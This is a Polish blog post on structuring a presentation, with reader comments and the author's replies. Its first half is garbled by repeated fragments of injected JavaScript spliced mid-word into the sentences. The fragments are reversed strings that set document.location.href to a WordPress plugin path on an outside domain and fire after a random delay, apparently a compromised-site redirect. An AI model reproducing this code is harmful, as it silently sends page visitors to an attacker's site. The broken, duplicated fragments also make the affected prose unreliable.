Dziś najprzyjemniejsza część tworzenia prezentacji a mianowicie generowanie pomysłów. Częstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to zdarza się, że gdy zebraliśmy już cały materiał, moglibyśmy na jego podstawie, napisać książkę a nasza prezentacja ma potrwać np. pół godziny.
Stajemy wtedy przed dylematem: jak uporządkować prezentację aby była ciekawa dla audytoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torium? Na czym się skoncentrować, a co wyrzucić? Ile materiału przygotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tować? Jak zmieścić się w czasie? Jak toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to wszystko zaplanować? No i jak ja się, kurczę nazywam?! :] (toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to a propos tremy)
Odpowiedzi na te pytania (no, poza tym jak się nazywasz) znajdziesz w filmie poniżej.
Komentarze jak zwykle mile widziane.
UWAGA! Osoby, które odpowiedzą w komentarzu na pytanie: Czego chcę się jeszcze toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowiedzieć na temat przygotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towania prezentacji od zera? otrzymają ode mnie raport specjalny “Mowa ciała działa!”
Jeśli czcionka na prezentacji w filmie jest mało witoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doczna, przejdź na tryb pełnoekranowy. Kliknij ikonkę ze strzałkami, w prawym toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dolnym rogu ekranu z filmem (druga od prawej)
Miłego oglądania!
![]() |
Wpis Ci się podobał?
Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!
Czy ta prezentacja została wykonana własnie w prezi.com?
Plusiki przy haśle są niewiadomą, na którą się czeka. To niezły chwyt. Zastanawiam się jak taka mapa mysli sprawdziłaby się w mojej prezentacji, do tej pory rozważałam użycie powerpointa, a co za tym idzie, prezentację liniową. Burzę mózgu już przeprowadziłam jakiś czas temu, wszystko lezy w stanie surowym.
Straszliwie boję się prezentacji i odpycha mnie od niej niewidzialna siła…
Czekam na kolejne części o prezentacjach.
Pozdrawiam.
Na filmach używam darmowego programu do tworzenia map myśli mindomo.com. Co do prezi.com to bardzo mi się podoba (pisałem o tym programie w moim newsletterze) Na pewno będę z niego korzystać, muszę najpierw go solidnie opanować.
Co do używania mindomo.com, to całkowicie się z Tobą zgadzam, że można go wykorzystywać w charakterze programu do prezentacji multimedialnych. Potrzebujesz tylko łącza z internetem bo w wersji podstawowej (basic) nie masz możliwości ściągnięcia mapy na dysk komputera.
Podstawowa zaleta tego typu prezentacji jest taka, że odbiorcy cały czas śledzą, w którym miejscu prezentacji są, co w przypadku Power Pointa nie zawsze się udaje.
Pozdrawiam
Witam,
bardzo cenne uwagi, zwłaszcza z koncepcją na strukturę prezentacji. Nigdy nie myślałam o wystąpieniach w taki sposób.
Dziękuję!
Angelika Śniegocka http://www.RozmowaRekrutacyjna.pl
Witaj Angeliko!
Co do struktury, to powinniśmy dążyć do jej maksymalnego uproszczenia, dlatego proponuję właśnie czytelne konspekty. Zauważ, że potem “wkłada się” po prostu wszystko w jedną całość jak elementy układanki. Pamiętaj też o stosowaniu metody “trójek” (opowiem o niej w kolejnym filmie). teraz tylko krótko – chodzi o to aby omawiając jakiś temat nie stosować więcej niż trzech elementów (podpunktów, argumentów, odpowiedzi). Gdy rozwiniemy nasza wypowiedź do 4 elementów, krzywa przyswajania wiedzy przez audytorium dramatycznie spadnie.
pozdrawiam
Witaj
Wspaniale napisane i zrozumiale , nie zastanawiałam się nigdy żeby to tak opracować w punktach i ułożyć to w konkretnych ramach .
pozdrawiam
Helena
Witaj!
Na pewno znasz powiedzenie: “każda improwizacja powinna być bardzo dobrze zaplanowana”. Dzięki rozpisaniu w punktach całego planu prezentacji mamy nad nią pełną kontrolę. To ułatwia pracę, nam prezenterom ale również pozwala lepiej zrozumieć i przyswoić materiał naszym słuchaczom. Zatem obie strony powinny być zadowolone.
Być może na pierwszy rzut oka (i ucha) wydaje się, że łatwiej napisać wszystko a potem zastanawiać się jak to podzielić ale wystarczy raz stworzyć prezentację według techniki 4 kroków aby zrozumieć jakie genialne jest to narzędzie. Rzeczywiście planowanie konstrukcja prezentacji zajmuje sporo czasu ( w stosunku do całego procesu tworzenie wystąpienia) ale po tym etapie mamy już “z górki”.
Zauważ, że w ostatnim filmie – “tworzenie motywującej prezentacji” właściwie wrzucaliśmy do rozwinięcia, początku i zakończenia, to co wykonaliśmy wcześniej, w dwóch pierwszych filmach. Musieliśmy tylko “okrasić” wstęp i zakończenie Elementami Przykuwającymi Uwagę.
pozdrawiam